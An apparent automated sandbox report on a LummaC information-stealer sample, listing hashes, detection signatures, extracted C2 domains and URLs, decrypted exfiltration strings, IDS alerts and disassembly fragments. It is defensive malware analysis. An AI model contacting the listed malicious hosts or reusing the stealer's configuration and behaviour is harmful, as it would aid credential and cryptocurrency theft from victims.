Windows Analysis Report
rHrG691f7q.exe

Overview

General Information

Sample name: rHrG691f7q.exe (renamed because the original name is a hash value)
Original sample name: f610013d7c84f779afa017218890e7ce.exe
Analysis ID: 1575138
MD5: f610013d7c84f779afa017218890e7ce
SHA1: b804e0105708cc52b09137bfd2b76c5515577e3a
SHA256: 69b0f2ca7e883e86bc905febffef4e074ef837451faa9e88dbba74fda64319a1
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rHrG691f7q.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\rHrG691f7q.exe" MD5: F610013D7C84F779AFA017218890E7CE)
    • 1A68.tmp.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC): {"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1640:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
3.3.1A68.tmp.exe.24e0000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
3.2.1A68.tmp.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
3.2.1A68.tmp.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
3.3.1A68.tmp.exe.24e0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T14:16:27.357655+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:29.854582+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:33.573527+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49768 | 23.55.153.106 | 443 | TCP
2024-12-14T14:16:28.405476+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:30.731798+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:28.405476+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:30.731798+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:29.854582+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:27.357655+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:31.670893+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 62214 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:28.412659+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54461 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.222907+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 51288 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:30.999936+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 56428 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:30.739913+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49493 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:25.984571+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64353 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:25.760174+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63859 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.897603+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 52796 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.448194+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64555 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:18.900335+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49722 | 104.21.56.70 | 443 | TCP
2024-12-14T14:16:20.657689+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49726 | 176.113.115.198 | 80 | TCP
2024-12-14T14:16:34.423166+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49768 | 23.55.153.106 | 443 | TCP

AV Detection

Source: rHrG691f7q.exe | Avira: detected
Source: https://wrathful-jammy.cyou/~ | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/z | Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/apiS | Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/api | Avira URL Cloud: Label: malware
Source: https://diffuculttan.xyz/api | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEN | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apiy | Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/apiZ | Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/api8 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | ReversingLabs: Detection: 42%
Source: rHrG691f7q.exe | ReversingLabs: Detection: 55%
Source: rHrG691f7q.exe | Virustotal: Detection: 40%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: rHrG691f7q.exe | Joe Sandbox ML: detected
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--

Compliance

Source: C:\Users\user\Desktop\rHrG691f7q.exe | Unpacked PE file: 0.2.rHrG691f7q.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | Unpacked PE file: 3.2.1A68.tmp.exe.400000.0.unpack
Source: rHrG691f7q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\rHrG691f7q.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_004389F2 FindFirstFileExW, 0_2_004389F2
Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024F8C59 FindFirstFileExW, 0_2_024F8C59
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0249D25A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024CC268
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB2C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024CB3FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_024B63B6
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0249C030
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024B70E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_024CD0F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_024B60F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB08B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB0AF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB05B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_024BA637
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BC6C3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024B6739
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_024A77E9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_024CC79B
